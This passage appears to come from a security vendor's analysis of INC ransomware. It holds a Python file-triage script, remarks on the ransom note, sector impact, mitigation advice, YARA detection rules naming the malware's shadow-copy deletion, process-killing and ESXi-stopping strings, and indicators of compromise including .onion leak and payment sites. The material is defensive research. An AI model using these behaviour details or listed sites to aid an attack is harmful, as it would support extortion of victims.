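SAMPLE_FILES = {
    "report.docx.INC": _constructed_sample(0x0C, b"\x00" * 8 + b"ciphertext-bytes"),
    "vm-disk.vmdk.INC": _constructed_sample(0x04, b"\x17\x2a" * 64),
    "notes.txt": b"just a plain text file with no footer",
    "odd.bin.INC": _constructed_sample(0x7F, b"xyz"),
}


def triage_all(files: dict) -> list:
    return [triage_file(name, data) for name, data in files.items()]


if __name__ == "__main__":
    for row in triage_all(SAMPLE_FILES):
        print(row)
```

Run against a real share, the same function can be fed file tails only (the last few hundred bytes of each file), which makes a sweep over large VMDKs practical; a file carrying the .INC extension without the footer, or vice versa, is worth a closer look during scoping.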
Ransom Note
Analysis
of the string tables and corresponding reference code confirms that the
ransomware stores its primary ransom note payload within the binary as a
hardcoded, Base64-encoded string snippet (~~~~ INC Ransom ~~~~…).
In addition
to data modification, the malware includes built-in capabilities to adjust the host
user interface. It overwrites the target host’s wallpaper with a visual
notification of the ransom demands, displayed directly on the user’s screen.
Conclusion and impact
INC continues to strengthen its ransomware
operation through Rust-based payload rewrites and continuous toolkit
enhancement, while carefully targeting industries such as health care, legal
services, professional services, manufacturing and construction where
operational downtime creates strong financial pressure to pay. This threat is
further amplified because these sectors depend heavily on uninterrupted
operations and supply chains, increasing the risk of collateral exposure across
vendor networks and downstream partners when breaches occur.
The group’s influence has also expanded
beyond its own brand following the 2024 sale of its source code, with related
strains appearing in operations such as Lynx and Sinobi. At the same time, the
disruption of LockBit and BlackCat allowed affiliates and tools to shift toward
groups like INC, helping them grow their presence within the ransomware
ecosystem. Because these affiliates continue to rely on opportunistic tactics
such as stolen credentials, phishing, credential reuse and exploitation of
unpatched remote services, organizations should prioritize reducing external
exposure and securing perimeter access points to limit the risk of intrusion.
Detection by Acronis
This threat has been detected and blocked by Acronis EDR / XDR.
Mitigation and recommendations
INC ransomware
typically gains initial access through exploiting vulnerable infrastructure or using
stolen or compromised credentials. Below are some guidelines to help
organizations prevent and mitigate the threat posed by INC ransomware.
- Backups and recovery. Follow the 3-2-1 backup rule by keeping at least three copies of data on two different media types, with one copy stored off-site, and ensure backups are offline or immutable and regularly tested for reliable restoration.
- Endpoint and ransomware protection. Deploy EDR and ransomware protection capable of detecting unauthorized encryption and exfiltration attempts and ensure all security tools are kept up to date with behavioral detections and anti-tamper protections enabled.
- Identity and access controls. Require multifactor authentication (MFA) and enforce the use of strong, complex alphanumeric passwords that are updated regularly.
- Network segmentation and hardening. Reduce attack surface by segmenting networks, disabling unnecessary services and ports and restricting outbound traffic.
- Patch and vulnerability management. Implement a robust patch and vulnerability management program across all systems, prioritizing fixes for vulnerabilities known to be exploited by ransomware.
- User awareness training. Regularly educate staff on phishing, social engineering and other tactics used by ransomware operators. Include conducting regular phishing simulations to reinforce awareness.
YARA rules
rule MAL_RANSOM_INC_WINDOWS
{
    meta:
        description = "Matches INC Ransomware Rust-compiled samples for Windows"
        author = "Acronis Threat Research Unit (TRU)"
    strings:
        $a1 = "[INC-README.txt.." ascii wide
        $a2 = "Successfully added file to queue:" ascii wide
        $a3 = "while deleting shadow copies from" ascii wide
        $a4 = "Successfully deleted shadow copies from" ascii wide
        $a5 = "while killing processes by mask" ascii wide
        $a6 = "while killing services by mask" ascii wide
        $a7 = "Successfully killed processes by mask" ascii wide
        $a8 = "while encrypting file:" ascii wide
        $a9 = "INCdirectory(ies)dirEncryption directory(ies)" ascii wide
    condition:
        (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550) and all of ($a*)
}

rule MAL_RANSOM_INC_LINUX
{
    meta:
        description = "Matches INC Ransomware Rust-compiled samples for Linux/ESXi"
        author = "Acronis Threat Research Unit (TRU)"
    strings:
        $a1 = "[INC-README.txtINC" ascii wide
        $a2 = "while running as a daemon" ascii wide
        $a3 = "while stopping ESXi machines" ascii wide
        $a4 = "while removing ESXi snapshots" ascii wide
        $a5 = "while setting motd" ascii wide
        $a6 = "fn5+fiBJTkMgUmFuc29tIH5+fn4" ascii wide
    condition:
        (uint32(0) == 0x464C457F) and all of ($a*)
}
Indicators of compromise (IOCs)
Windows
589d9480fbfec2d8e61638eb0b537183d0f9977411fd1d2c0f8eb611feebe880
7f37351979c249417cb180b4ede0ed17e5fe2a1f08add4d72606b589f8fdb245
5cc212f84d2bf3fbab165aaf09b16e00fcf2f1ccd880d24b14404c53dcdbf241
60aeb9f7bccf377ff02ed64783e66a62c0f976878d9729b067bc7e5b0b9da9d6
6cd349eda0fa6c8b274a0920852c68f8b727afea1fdbc69ad183cef05d9cf141
Network
incblog[.]su
incblog6qu4y4mm4zvw5nrmue6qbwtgjsxpw6b7ixzssu36tsajldoad[.]onion
incpaykabjqc2mtdxq6c23nqh4x6m5dkps5fr6vgdkgzp5njssx6qkid[.]onion
